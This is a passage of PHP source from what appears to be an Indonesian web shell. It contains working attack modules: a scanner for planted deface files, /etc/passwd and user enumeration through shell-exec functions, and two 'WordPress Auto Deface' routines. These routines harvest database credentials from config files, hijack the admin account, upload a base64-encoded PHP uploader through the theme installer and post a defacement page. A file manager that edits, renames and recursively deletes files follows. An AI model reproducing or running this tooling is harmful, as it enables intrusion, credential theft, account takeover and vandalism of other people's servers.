  3627. curl_setopt($ch, CURLOPT_POST, 1);
  3628. $resp = curl_exec($ch);
  3629. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3630. $array = explode(",,", $resp);
  3631. unset($array[0]);
  3632. foreach($array as $lnk) {
  3633. $lnk = "http://$lnk";
  3634. $lnk = str_replace(",", "", $lnk);
  3635. echo $lnk."\n";
  3636. ob_flush();
  3637. flush();
  3638. }
  3639. curl_close($ch);
  3640. }
  3641. function cek($url) {
  3642. $ch = curl_init($url);
  3643. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3644. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3645. $resp = curl_exec($ch);
  3646. return $resp;
  3647. }
  3648. $cwd = getcwd();
  3649. $ambil_user = explode("/", $cwd);
  3650. $user = $ambil_user[2];
  3651. if($_POST['reverse']) {
  3652. $site = explode("\r\n", $_POST['url']);
  3653. $file = $_POST['file'];
  3654. foreach($site as $url) {
  3655. $cek = cek("$url/~$user/$file");
  3656. if(preg_match("/hacked/i", $cek)) {
  3657. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=blue>Fake Root!</font><br>";
  3658. }
  3659. }
  3660. } else {
  3661. echo "<center><form method='post'>
  3662. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3663. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3664. Domain: <br>
  3665. <textarea style='width: 450px; height: 250px;' name='url'>";
  3666. reverse($_SERVER['HTTP_HOST']);
  3667. echo "</textarea><br>
  3668. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3669. </form><br>
  3670. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3671. }
  3672. } elseif($_GET['do'] == 'adminer') {
  3673. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3674. function adminer($url, $isi) {
  3675. $fp = fopen($isi, "w");
  3676. $ch = curl_init();
  3677. curl_setopt($ch, CURLOPT_URL, $url);
  3678. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3679. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3680. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3681. curl_setopt($ch, CURLOPT_FILE, $fp);
  3682. return curl_exec($ch);
  3683. curl_close($ch);
  3684. fclose($fp);
  3685. ob_flush();
  3686. flush();
  3687. }
  3688. if(file_exists('adminer.php')) {
  3689. echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>Disini Bep Adminernya !!!</a></font></center>";
  3690. } else {
  3691. if(adminer("https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-en.php","adminer.php")) {
  3692. echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>Disini Bep Adminernya !!!</a></font></center>";
  3693. } else {
  3694. echo "<center><font color=red>Failed Create Adminer File</font></center>";
  3695. }
  3696. }
  3697. }elseif($_GET['do'] == 'passwbypass') {
  3698. echo '<center>Bypass etc/passw With:<br>
  3699. <table style="width:50%">
  3700. <tr>
  3701. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3702. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3703. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3704. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3705. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3706. </tr></table>Bypass User With : <table style="width:50%">
  3707. <tr>
  3708. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3709. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3710. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3711. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3712. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3713. </tr>
  3714. </table><br>';
  3715.  
  3716.  
  3717. if ($_POST['awkuser']) {
  3718. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3719. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3720. echo "</textarea><br>";
  3721. }
  3722. if ($_POST['systuser']) {
  3723. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3724. echo system("ls /var/mail");
  3725. echo "</textarea><br>";
  3726. }
  3727. if ($_POST['passthuser']) {
  3728. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3729. echo passthru("ls /var/mail");
  3730. echo "</textarea><br>";
  3731. }
  3732. if ($_POST['exuser']) {
  3733. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3734. echo exec("ls /var/mail");
  3735. echo "</textarea><br>";
  3736. }
  3737. if ($_POST['shexuser']) {
  3738. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3739. echo shell_exec("ls /var/mail");
  3740. echo "</textarea><br>";
  3741. }
  3742. if($_POST['syst'])
  3743. {
  3744. echo"<textarea class='inputz' cols='65' rows='15'>";
  3745. echo system("cat /etc/passwd");
  3746. echo"</textarea><br><br><b></b><br>";
  3747. }
  3748. if($_POST['passth'])
  3749. {
  3750. echo"<textarea class='inputz' cols='65' rows='15'>";
  3751. echo passthru("cat /etc/passwd");
  3752. echo"</textarea><br><br><b></b><br>";
  3753. }
  3754. if($_POST['ex'])
  3755. {
  3756. echo"<textarea class='inputz' cols='65' rows='15'>";
  3757. echo exec("cat /etc/passwd");
  3758. echo"</textarea><br><br><b></b><br>";
  3759. }
  3760. if($_POST['shex'])
  3761. {
  3762. echo"<textarea class='inputz' cols='65' rows='15'>";
  3763. echo shell_exec("cat /etc/passwd");
  3764. echo"</textarea><br><br><b></b><br>";
  3765. }
  3766. echo '<center>';
  3767. if($_POST['melex'])
  3768. {
  3769. echo"<textarea class='inputz' cols='65' rows='15'>";
  3770. for($uid=0;$uid<60000;$uid++){
  3771. $ara = posix_getpwuid($uid);
  3772. if (!empty($ara)) {
  3773. while (list ($key, $val) = each($ara)){
  3774. print "$val:";
  3775. }
  3776. print "\n";
  3777. }
  3778. }
  3779. echo"</textarea><br><br>";
  3780. }
  3781. //
  3782.  
  3783. //
  3784. } elseif($_GET['do'] == 'auto_dwp') {
  3785. if($_POST['auto_deface_wp']) {
  3786. function anucurl($sites) {
  3787. $ch = curl_init($sites);
  3788. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3789. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3790. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3791. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3792. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3793. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3794. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3795. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3796. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3797. $data = curl_exec($ch);
  3798. curl_close($ch);
  3799. return $data;
  3800. }
  3801. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3802. $post = array(
  3803. "log" => "$userr",
  3804. "pwd" => "$pass",
  3805. "rememberme" => "forever",
  3806. "wp-submit" => "$wp_submit",
  3807. "redirect_to" => "$web",
  3808. "testcookie" => "1",
  3809. );
  3810. $ch = curl_init($cek);
  3811. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3812. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3813. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3814. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3815. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3816. curl_setopt($ch, CURLOPT_POST, 1);
  3817. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3818. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3819. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3820. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3821. $data = curl_exec($ch);
  3822. curl_close($ch);
  3823. return $data;
  3824. }
  3825. $scan = $_POST['link_config'];
  3826. $link_config = scandir($scan);
  3827. $script = htmlspecialchars($_POST['script']);
  3828. $user = "maling";
  3829. $pass = "maling27";
  3830. $passx = md5($pass);
  3831. foreach($link_config as $dir_config) {
  3832. if(!is_file("$scan/$dir_config")) continue;
  3833. $config = file_get_contents("$scan/$dir_config");
  3834. if(preg_match("/WordPress/", $config)) {
  3835. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3836. $dbuser = ambilkata($config,"DB_USER', '","'");
  3837. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3838. $dbname = ambilkata($config,"DB_NAME', '","'");
  3839. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3840. $prefix = $dbprefix."users";
  3841. $option = $dbprefix."options";
  3842. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3843. $db = mysql_select_db($dbname);
  3844. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3845. $result = mysql_fetch_array($q);
  3846. $id = $result[ID];
  3847. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3848. $result2 = mysql_fetch_array($q2);
  3849. $target = $result2[option_value];
  3850. if($target == '') {
  3851. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3852. } else {
  3853. echo "[+] $target <br>";
  3854. }
  3855. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3856. if(!$conn OR !$db OR !$update) {
  3857. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3858. mysql_close($conn);
  3859. } else {
  3860. $site = "$target/wp-login.php";
  3861. $site2 = "$target/wp-admin/theme-install.php?upload";
  3862. $b1 = anucurl($site2);
  3863. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3864. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3865. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3866. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3867. $www = "m.php";
  3868. $fp5 = fopen($www,"w");
  3869. fputs($fp5,$upload3);
  3870. $post2 = array(
  3871. "_wpnonce" => "$anu2",
  3872. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3873. "themezip" => "@$www",
  3874. "install-theme-submit" => "Install Now",
  3875. );
  3876. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3877. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3878. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3879. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3880. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3881. curl_setopt($ch, CURLOPT_POST, 1);
  3882. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3883. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3884. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3885. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3886. $data3 = curl_exec($ch);
  3887. curl_close($ch);
  3888. $y = date("Y");
  3889. $m = date("m");
  3890. $namafile = "id.php";
  3891. $fpi = fopen($namafile,"w");
  3892. fputs($fpi,$script);
  3893. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3894. curl_setopt($ch6, CURLOPT_POST, true);
  3895. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3896. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3897. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3898. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3899. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3900. $postResult = curl_exec($ch6);
  3901. curl_close($ch6);
  3902. $as = "$target/k.php";
  3903. $bs = anucurl($as);
  3904. if(preg_match("#$script#is", $bs)) {
  3905. echo "[+] <font color='blue'>Succes</font><br>";
  3906. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3907. } else {
  3908. echo "[-] <font color='red'>Failed</font><br>";
  3909. echo "[!!] coba aja manual: <br>";
  3910. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3911. echo "[+] username: <font color=blue>$user</font><br>";
  3912. echo "[+] password: <font color=blue>$pass</font><br><br>";
  3913. }
  3914. mysql_close($conn);
  3915. }
  3916. }
  3917. }
  3918. } else {
  3919. echo "<center><h1>WordPress Auto Deface</h1>
  3920. <form method='post'>
  3921. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3922. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Vlyn' required><br>
  3923. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Submit'>
  3924. </form>
  3925. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3926. </center>";
  3927. }
  3928. } elseif($_GET['do'] == 'auto_dwp2') {
  3929. if($_POST['auto_deface_wp']) {
  3930. function anucurl($sites) {
  3931. $ch = curl_init($sites);
  3932. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3933. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3934. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3935. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3936. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3937. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3938. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3939. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3940. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3941. $data = curl_exec($ch);
  3942. curl_close($ch);
  3943. return $data;
  3944. }
  3945. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3946. $post = array(
  3947. "log" => "$userr",
  3948. "pwd" => "$pass",
  3949. "rememberme" => "forever",
  3950. "wp-submit" => "$wp_submit",
  3951. "redirect_to" => "$web",
  3952. "testcookie" => "1",
  3953. );
  3954. $ch = curl_init($cek);
  3955. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3956. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3957. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3958. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3959. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3960. curl_setopt($ch, CURLOPT_POST, 1);
  3961. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3962. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3963. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3964. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3965. $data = curl_exec($ch);
  3966. curl_close($ch);
  3967. return $data;
  3968. }
  3969. $link = explode("\r\n", $_POST['link']);
  3970. $script = htmlspecialchars($_POST['script']);
  3971. $user = "indoxploit";
  3972. $pass = "indoxploit";
  3973. $passx = md5($pass);
  3974. foreach($link as $dir_config) {
  3975. $config = anucurl($dir_config);
  3976. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3977. $dbuser = ambilkata($config,"DB_USER', '","'");
  3978. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3979. $dbname = ambilkata($config,"DB_NAME', '","'");
  3980. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3981. $prefix = $dbprefix."users";
  3982. $option = $dbprefix."options";
  3983. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3984. $db = mysql_select_db($dbname);
  3985. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3986. $result = mysql_fetch_array($q);
  3987. $id = $result[ID];
  3988. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3989. $result2 = mysql_fetch_array($q2);
  3990. $target = $result2[option_value];
  3991. if($target == '') {
  3992. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3993. } else {
  3994. echo "[+] $target <br>";
  3995. }
  3996. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3997. if(!$conn OR !$db OR !$update) {
  3998. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3999. mysql_close($conn);
  4000. } else {
  4001. $site = "$target/wp-login.php";
  4002. $site2 = "$target/wp-admin/theme-install.php?upload";
  4003. $b1 = anucurl($site2);
  4004. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4005. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4006. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  4007. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4008. $www = "m.php";
  4009. $fp5 = fopen($www,"w");
  4010. fputs($fp5,$upload3);
  4011. $post2 = array(
  4012. "_wpnonce" => "$anu2",
  4013. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4014. "themezip" => "@$www",
  4015. "install-theme-submit" => "Install Now",
  4016. );
  4017. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4018. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4019. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4020. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4021. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4022. curl_setopt($ch, CURLOPT_POST, 1);
  4023. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4024. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4025. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4026. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4027. $data3 = curl_exec($ch);
  4028. curl_close($ch);
  4029. $y = date("Y");
  4030. $m = date("m");
  4031. $namafile = "id.php";
  4032. $fpi = fopen($namafile,"w");
  4033. fputs($fpi,$script);
  4034. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4035. curl_setopt($ch6, CURLOPT_POST, true);
  4036. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4037. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4038. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4039. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4040. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4041. $postResult = curl_exec($ch6);
  4042. curl_close($ch6);
  4043. $as = "$target/k.php";
  4044. $bs = anucurl($as);
  4045. if(preg_match("#$script#is", $bs)) {
  4046. echo "[+] <font color='blue'>berhasil mepes...</font><br>";
  4047. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4048. } else {
  4049. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4050. echo "[!!] coba aja manual: <br>";
  4051. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4052. echo "[+] username: <font color=blue>$user</font><br>";
  4053. echo "[+] password: <font color=blue>$pass</font><br><br>";
  4054. }
  4055. mysql_close($conn);
  4056. }
  4057. }
  4058. } else {
  4059. echo "<center><h1>WordPress Auto Deface V.2</h1>
  4060. <form method='post'>
  4061. Link Config: <br>
  4062. <textarea name='link' placeholder='http://target.com/Vlyn_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4063. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Vlyn' required><br>
  4064. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Submit'>
  4065. </form></center>";
  4066. }
  4067. } elseif($_GET['act'] == 'newfile') {
  4068. if($_POST['new_save_file']) {
  4069. $newfile = htmlspecialchars($_POST['newfile']);
  4070. $fopen = fopen($newfile, "a+");
  4071. if($fopen) {
  4072. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4073. } else {
  4074. $act = "<font color=red>permission denied</font>";
  4075. }
  4076. }
  4077. echo $act;
  4078. echo "<form method='post'>
  4079. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4080. <input type='submit' name='new_save_file' value='Submit'>
  4081. </form>";
  4082. } elseif($_GET['act'] == 'newfolder') {
  4083. if($_POST['new_save_folder']) {
  4084. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4085. if(!mkdir($new_folder)) {
  4086. $act = "<font color=red>permission denied</font>";
  4087. } else {
  4088. $act = "<script>window.location='?dir=".$dir."';</script>";
  4089. }
  4090. }
  4091. echo $act;
  4092. echo "<form method='post'>
  4093. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4094. <input type='submit' name='new_save_folder' value='Submit'>
  4095. </form>";
  4096. } elseif($_GET['act'] == 'rename_dir') {
  4097. if($_POST['dir_rename']) {
  4098. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4099. if($dir_rename) {
  4100. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4101. } else {
  4102. $act = "<font color=red>permission denied</font>";
  4103. }
  4104. echo "".$act."<br>";
  4105. }
  4106. echo "<form method='post'>
  4107. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4108. <input type='submit' name='dir_rename' value='rename'>
  4109. </form>";
  4110. } elseif($_GET['act'] == 'delete_dir') {
  4111. function Delete($path)
  4112. {
  4113. if (is_dir($path) === true)
  4114. {
  4115. $files = array_diff(scandir($path), array('.', '..'));
  4116. foreach ($files as $file)
  4117. {
  4118. Delete(realpath($path) . '/' . $file);
  4119. }
  4120. return rmdir($path);
  4121. }
  4122. else if (is_file($path) === true)
  4123. {
  4124. return unlink($path);
  4125. }
  4126. return false;
  4127. }
  4128. $delete_dir = Delete($dir);
  4129. if($delete_dir) {
  4130. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4131. } else {
  4132. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4133. }
  4134. echo $act;
  4135. } elseif($_GET['act'] == 'view') {
  4136. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4137. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4138. } elseif($_GET['act'] == 'edit') {
  4139. if($_POST['save']) {
  4140. $save = file_put_contents($_GET['file'], $_POST['src']);
  4141. if($save) {
  4142. $act = "<font color=blue>Saved!</font>";
  4143. } else {
  4144. $act = "<font color=red>permission denied</font>";
  4145. }
  4146. echo "".$act."<br>";
  4147. }
  4148. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4149. echo "<form method='post'>
  4150. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4151. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4152. </form>";
  4153. } elseif($_GET['act'] == 'rename') {
  4154. if($_POST['do_rename']) {
  4155. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4156. if($rename) {
  4157. $act = "<script>window.location='?dir=".$dir."';</script>";
  4158. } else {
  4159. $act = "<font color=red>permission denied</font>";
  4160. }
  4161. echo "".$act."<br>";
  4162. }
  4163. echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4164. echo "<form method='post'>
  4165. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4166. <input type='submit' name='do_rename' value='rename'>
  4167. </form>";
  4168. } elseif($_GET['act'] == 'delete') {
  4169. $delete = unlink($_GET['file']);
  4170. if($delete) {
  4171. $act = "<script>window.location='?dir=".$dir."';</script>";
  4172. } else {
  4173. $act = "<font color=red>permission denied</font>";
  4174. }
  4175. echo $act;
  4176. }
  4177. else {
  4178. if(is_dir($dir) == true) {
  4179. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4180. <tr>
  4181. <th class="th_home"><center>Name</center></th>
  4182. <th class="th_home"><center>Type</center></th>
  4183. <th class="th_home"><center>Size</center></th>
  4184. <th class="th_home"><center>Last Modified</center></th>
  4185. <th class="th_home"><center>Permission</center></th>
  4186. <th class="th_home"><center>Action</center></th>
  4187. </tr>';
  4188. $scandir = scandir($dir);
  4189. foreach($scandir as $dirx) {
  4190. $dtype = filetype("$dir/$dirx");
  4191. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4192. if(!is_dir("$dir/$dirx")) continue;
  4193. if($dirx === '..') {
  4194. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4195. } elseif($dirx === '.') {
  4196. $href = "<a href='?dir=$dir'>$dirx</a>";
  4197. } else {
  4198. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4199. }
  4200. if($dirx === '.' || $dirx === '..') {
  4201. $act_dir = "<from><select onchange='if (this.value) window.open(this.value);'><option selected='selected' value=''> Select </option><option value='?act=newfile&dir=$dir'>newfile</option><option value='?act=newfolder&dir=$dir'>newfolder</option>";
  4202. } else {
  4203. $act_dir = "<from><select onchange='if (this.value) window.open(this.value);'><option selected='selected' value=''> Select </option><option value='?act=rename_dir&dir=$dir/$dirx'>rename</option><option value='?act=delete_dir&dir=$dir/$dirx'>delete</option>";
  4204. }
  4205. echo "<tr>";
  4206. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4207. echo "<td class='td_home'><center>$dtype</center></td>";
  4208. echo "<td class='td_home'><center>-</center></th>";
  4209. echo "<td class='td_home'><center>$dtime</center></td>";
  4210. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4211. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4212. }
  4213. echo "</tr>";
  4214. foreach($scandir as $file) {
  4215. $ftype = filetype("$dir/$file");
  4216. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
